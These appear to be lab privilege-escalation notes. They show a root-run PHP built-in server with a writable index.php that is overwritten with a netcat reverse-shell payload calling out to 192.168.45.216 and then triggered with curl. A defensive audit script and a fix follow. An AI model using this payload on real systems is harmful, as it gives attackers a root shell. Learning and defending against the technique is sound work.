Priv Esc

ps aux | grep root
/bin/sh -c /usr/bin/php -S 127.0.0.1:57 -t /var/tmp/sv/

A PHP web app is being served locally on port 57 by a process running as root, with /var/tmp/sv/ as the web app's root directory.

index.php is owned by root but writable by us 👍

echo "<?php system('nc 192.168.45.216 1338 -c /bin/bash');?>" > index.php
curl http://127.0.0.1:57/index.php
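
A defender-side check for the misconfiguration above, as an added example that is not part of the original notes: it pulls the document root of root-run `php -S` servers out of `ps aux` output and lists anything under it that a non-root user can modify. The function names and the sample `ps` line are constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the original notes): audit root-run PHP built-in
# servers for document roots that unprivileged users can write to.

# Constructed sample of one `ps aux` line, modelled on the output above.
SAMPLE_PS='root 812 0.0 0.1 2892 980 ? Ss 10:01 0:00 /bin/sh -c /usr/bin/php -S 127.0.0.1:57 -t /var/tmp/sv/'

# Read `ps aux`-style lines on stdin and print the -t document root of every
# PHP built-in server (php -S ... -t DIR) owned by root.
# Servers started without -t serve their working directory and are skipped.
php_docroots() {
    awk '$1 == "root" {
        is_php = 0; serving = 0; docroot = ""
        for (i = 11; i <= NF; i++) {          # COMMAND starts at field 11
            if ($i ~ /(^|\/)php[0-9.]*$/) is_php = 1
            if ($i == "-S") serving = 1
            if ($i == "-t" && i < NF) docroot = $(i + 1)
        }
        if (is_php && serving && docroot != "") print docroot
    }' | sort -u
}

# Print every file or directory under DIR (DIR included) that someone other
# than OWNER_UID could modify: group-writable, world-writable, or owned by a
# different uid. Symlinks are skipped because their mode bits are not
# meaningful on Linux.
writable_by_others() {
    dir=$1
    owner_uid=${2:-0}
    find "$dir" ! -type l \
        \( -perm -0020 -o -perm -0002 -o ! -uid "$owner_uid" \) -print
}

# On a live host, run as root:
#   ps aux | php_docroots | while read -r d; do writable_by_others "$d" 0; done
```

Any path this prints is code that root will execute on the next request; the fix is to make it root-owned with mode 644 (755 for directories) or to run the server as an unprivileged user.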
